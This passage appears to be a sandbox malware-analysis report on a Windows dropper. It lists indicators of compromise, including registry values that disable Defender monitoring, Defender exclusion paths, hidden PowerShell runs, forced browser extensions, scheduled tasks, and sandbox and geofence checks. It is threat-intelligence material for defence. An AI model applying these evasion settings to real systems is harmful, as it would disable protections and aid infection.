Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
245s -
max time network
246s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
26/08/2024, 05:01 UTC
Static task
static1
Behavioral task
behavioral1
Sample
35ef4c3815a9201d702e0f16ff7d5778ff092063b6e610d2ced58cb25eba2549.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
35ef4c3815a9201d702e0f16ff7d5778ff092063b6e610d2ced58cb25eba2549.exe
Resource
win10-20240404-en
General
-
Target
35ef4c3815a9201d702e0f16ff7d5778ff092063b6e610d2ced58cb25eba2549.exe
-
Size
7.3MB
-
MD5
d899e1c3b4b597f35991ad001796efb6
-
SHA1
74b306cc449fab5ca903c480a953c4390660cca4
-
SHA256
35ef4c3815a9201d702e0f16ff7d5778ff092063b6e610d2ced58cb25eba2549
-
SHA512
99220fbfc50497a6c194a0adff91ab88d8617d71572e787896d11ba374d936acdc4fa2ab519d494cc5c6a0f1bd2d19158f3bed4a782827e88f51c562a9c1daa0
-
SSDEEP
196608:91OlKUM0XQhhsNRl31gOfczhFgsm7BrrcfWMhbr0Ow6mrjKLlT:3OlQ0U+pfcFCsm7BrrcfXG6JLl
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\BiTaXhratCGNPnVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\MivewcCGXeCU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\ErKIoDgHiflivqkZ = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\MivewcCGXeCU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\olrZuEJhuzUWbFuCi = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\olrZuEJhuzUWbFuCi = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\BnSeAqsvAhUdC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZIWhWpltLlQHHUslkTR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\BiTaXhratCGNPnVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\ErKIoDgHiflivqkZ = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\TusZhOGSSwUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZIWhWpltLlQHHUslkTR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\rksWaXujU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\ErKIoDgHiflivqkZ = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\BnSeAqsvAhUdC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\rksWaXujU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\ErKIoDgHiflivqkZ = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\TusZhOGSSwUn = "0" reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 28 2704 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Run Powershell and hide display window.
pid Process 2304 powershell.exe 3036 powershell.exe 2276 powershell.EXE 1356 powershell.exe 2136 powershell.exe 2088 powershell.exe 1520 powershell.exe 2396 powershell.EXE 1628 powershell.EXE 2204 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Control Panel\International\Geo\Nation gLYDEcB.exe -
Executes dropped EXE 4 IoCs
pid Process 2312 Install.exe 2116 Install.exe 2068 YBLNFyl.exe 612 gLYDEcB.exe -
Indirect Command Execution 1 TTPs 19 IoCs
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.
pid Process 2092 forfiles.exe 768 forfiles.exe 2256 forfiles.exe 2836 forfiles.exe 2700 forfiles.exe 2572 forfiles.exe 1560 forfiles.exe 2996 forfiles.exe 2748 forfiles.exe 848 forfiles.exe 2288 forfiles.exe 496 forfiles.exe 1696 forfiles.exe 1392 forfiles.exe 2720 forfiles.exe 2764 forfiles.exe 804 forfiles.exe 684 forfiles.exe 2760 forfiles.exe -
Loads dropped DLL 23 IoCs
pid Process 3040 35ef4c3815a9201d702e0f16ff7d5778ff092063b6e610d2ced58cb25eba2549.exe 2312 Install.exe 2312 Install.exe 2312 Install.exe 2312 Install.exe 2116 Install.exe 2116 Install.exe 2116 Install.exe 1148 WerFault.exe 1148 WerFault.exe 1148 WerFault.exe 2704 rundll32.exe 2704 rundll32.exe 2704 rundll32.exe 2704 rundll32.exe 1720 WerFault.exe 1720 WerFault.exe 1720 WerFault.exe 1720 WerFault.exe 1720 WerFault.exe 2028 WerFault.exe 2028 WerFault.exe 2028 WerFault.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json gLYDEcB.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json gLYDEcB.exe -
Drops file in System32 directory 27 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol YBLNFyl.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol gLYDEcB.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol YBLNFyl.exe File created C:\Windows\system32\GroupPolicy\gpt.ini YBLNFyl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat gLYDEcB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_5CF45833F44BFC2995315451A3896ACA gLYDEcB.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA gLYDEcB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_5CF45833F44BFC2995315451A3896ACA gLYDEcB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_9CE832D646FBAFC5C4ACFC523FDD84AD gLYDEcB.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 gLYDEcB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_68D058512F3515153DEB95A1F4E72552 gLYDEcB.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA gLYDEcB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_9CE832D646FBAFC5C4ACFC523FDD84AD gLYDEcB.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini YBLNFyl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 gLYDEcB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_68D058512F3515153DEB95A1F4E72552 gLYDEcB.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\rksWaXujU\EFzTpY.dll gLYDEcB.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi gLYDEcB.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi gLYDEcB.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak gLYDEcB.exe File created C:\Program Files (x86)\ZIWhWpltLlQHHUslkTR\izElhPb.xml gLYDEcB.exe File created C:\Program Files (x86)\BnSeAqsvAhUdC\nYKHVyW.xml gLYDEcB.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja gLYDEcB.exe File created C:\Program Files (x86)\MivewcCGXeCU2\jEUFkzwTnpFYz.dll gLYDEcB.exe File created C:\Program Files (x86)\BnSeAqsvAhUdC\xpBUDGD.dll gLYDEcB.exe File created C:\Program Files (x86)\MivewcCGXeCU2\pfpSGyE.xml gLYDEcB.exe File created C:\Program Files (x86)\ZIWhWpltLlQHHUslkTR\WByYeZD.dll gLYDEcB.exe File created C:\Program Files (x86)\rksWaXujU\dgpWayZ.xml gLYDEcB.exe File created C:\Program Files (x86)\TusZhOGSSwUn\eIsLsWF.dll gLYDEcB.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bWNXgrRlacKgnUwPKK.job schtasks.exe File created C:\Windows\Tasks\mVwrlHrSDNRLOGqZG.job schtasks.exe File created C:\Windows\Tasks\AlVsOicJKGYGSUS.job schtasks.exe File created C:\Windows\Tasks\KOXGBKFkHUHlhNtav.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 1148 2068 WerFault.exe 61 1720 2116 WerFault.exe 31 2028 612 WerFault.exe 224 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 35ef4c3815a9201d702e0f16ff7d5778ff092063b6e610d2ced58cb25eba2549.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gLYDEcB.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wscript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gpupdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{169C2FCC-CF88-4F10-BAB6-B3C11DB09B6F}\WpadDecision = "0" gLYDEcB.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs gLYDEcB.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs gLYDEcB.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{169C2FCC-CF88-4F10-BAB6-B3C11DB09B6F}\WpadDecisionReason = "1" gLYDEcB.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates gLYDEcB.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 gLYDEcB.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix gLYDEcB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" gLYDEcB.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs gLYDEcB.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates gLYDEcB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings gLYDEcB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed gLYDEcB.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs gLYDEcB.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs gLYDEcB.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs gLYDEcB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust gLYDEcB.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" YBLNFyl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings gLYDEcB.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\b2-8d-6a-62-f9-8c\WpadDecisionReason = "1" gLYDEcB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA gLYDEcB.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs gLYDEcB.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs gLYDEcB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{169C2FCC-CF88-4F10-BAB6-B3C11DB09B6F}\b2-8d-6a-62-f9-8c gLYDEcB.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\b2-8d-6a-62-f9-8c\WpadDecisionTime = d0acc06475f7da01 gLYDEcB.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates gLYDEcB.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" gLYDEcB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" gLYDEcB.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs gLYDEcB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad gLYDEcB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\b2-8d-6a-62-f9-8c\WpadDetectedUrl rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached YBLNFyl.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{6C467336-8281-4E60-8204-430CED96822D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 010000000000000030f6513975f7da01 YBLNFyl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host wscript.exe Set value (str) 